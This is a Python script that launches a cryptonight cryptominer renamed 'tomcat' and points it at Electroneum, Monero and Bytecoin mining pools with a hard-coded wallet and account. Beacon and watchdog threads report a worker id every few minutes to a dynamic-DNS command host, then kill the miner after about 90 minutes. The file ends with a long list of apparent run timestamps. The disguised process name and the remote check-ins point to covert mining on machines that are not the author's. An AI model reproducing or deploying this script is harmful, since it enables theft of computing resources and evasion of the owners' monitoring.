import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:24:06.439328
#2018-02-17 17:12:07.116850
#2018-02-17 19:00:04.573270
#2018-02-17 20:49:05.982990
#2018-02-17 22:37:05.272611
#2018-02-18 00:21:03.891525
#2018-02-18 02:12:01.290875
#2018-02-18 03:58:07.252279
#2018-02-18 05:48:05.870492
#2018-02-18 07:40:05.659852
#2018-02-18 09:27:01.899189
#2018-02-18 11:13:01.919638
#2018-02-18 12:59:05.807186
#2018-02-18 14:47:03.631280
#2018-02-18 16:36:06.887406
#2018-02-18 18:26:06.794008
#2018-02-18 20:13:03.355390
#2018-02-18 21:59:02.028696
#2018-02-18 23:48:04.117000
#2018-02-19 01:34:07.180274
#2018-02-19 03:23:06.007767
#2018-02-19 05:08:07.325750
#2018-02-19 06:53:04.613276
#2018-02-19 08:43:08.364879
#2018-02-19 10:32:04.339758
#2018-02-19 12:19:08.262895
#2018-02-19 14:06:08.028565
#2018-02-19 15:55:06.092981
#2018-02-19 17:42:09.014792
#2018-02-19 19:29:08.200159
#2018-02-19 21:16:05.525387
#2018-02-19 23:01:07.897831
#2018-02-20 00:45:08.713364
#2018-02-20 02:37:06.504410
#2018-02-20 04:26:05.340199
#2018-02-20 06:09:04.262392
#2018-02-20 07:54:06.842517
#2018-02-20 09:40:04.327817
#2018-02-20 11:24:07.868756
#2018-02-20 13:10:11.216922
#2018-02-20 14:56:06.137167
#2018-02-20 16:41:05.681755
#2018-02-20 18:29:01.317642
#2018-02-20 20:20:09.969200
#2018-02-20 22:07:06.438389
#2018-02-20 23:51:01.201285
#2018-02-21 01:35:09.301290
#2018-02-21 03:23:05.712418
#2018-02-21 05:10:06.709475
#2018-02-21 06:58:01.658331
#2018-02-21 08:44:17.968849
#2018-02-21 10:32:07.166743
#2018-02-21 12:19:04.156814
#2018-02-21 14:06:08.573480
#2018-02-21 15:52:13.172529
#2018-02-21 17:43:10.742124
#2018-02-21 19:31:07.331857
#2018-02-21 21:18:07.820515
#2018-02-21 23:04:04.126011
#2018-02-22 00:54:02.100322
#2018-02-22 02:41:06.697605
#2018-02-22 04:27:07.229256
#2018-02-22 06:12:05.046640
#2018-02-22 07:58:05.066920
#2018-02-22 09:47:09.042003
#2018-02-22 11:32:07.548065
#2018-02-22 13:20:09.150437
#2018-02-22 15:09:06.072946
#2018-02-22 16:53:12.757369
#2018-02-22 18:43:01.443611
#2018-02-22 20:34:09.075977
#2018-02-22 22:20:08.595876
#2018-02-23 00:07:07.178588
#2018-02-23 01:57:05.103888
#2018-02-23 03:43:06.274862
#2018-02-23 05:28:06.817959
#2018-02-23 07:14:03.155401
#2018-02-23 09:19:03.878305
#2018-02-23 11:24:02.219817
#2018-02-23 13:14:07.817106
#2018-02-23 14:59:02.195872
#2018-02-23 16:47:01.604989
#2018-02-23 18:42:06.246251
#2018-02-23 20:29:08.625591
#2018-02-23 22:17:04.521938
#2018-02-24 00:03:01.792048
#2018-02-24 01:52:05.742809
#2018-02-24 03:46:04.470747
#2018-02-24 05:34:06.293749
#2018-02-24 07:20:09.193371
#2018-02-24 09:10:07.657167
#2018-02-24 11:06:01.951805
#2018-02-24 12:55:06.093857
#2018-02-24 14:43:04.310679
#2018-02-24 16:34:07.594877
#2018-02-24 18:24:02.065436
#2018-02-24 20:10:08.127120
#2018-02-24 21:54:07.222885
#2018-02-25 00:54:06.579540
#2018-02-25 03:53:04.966301
#2018-02-25 07:24:04.933960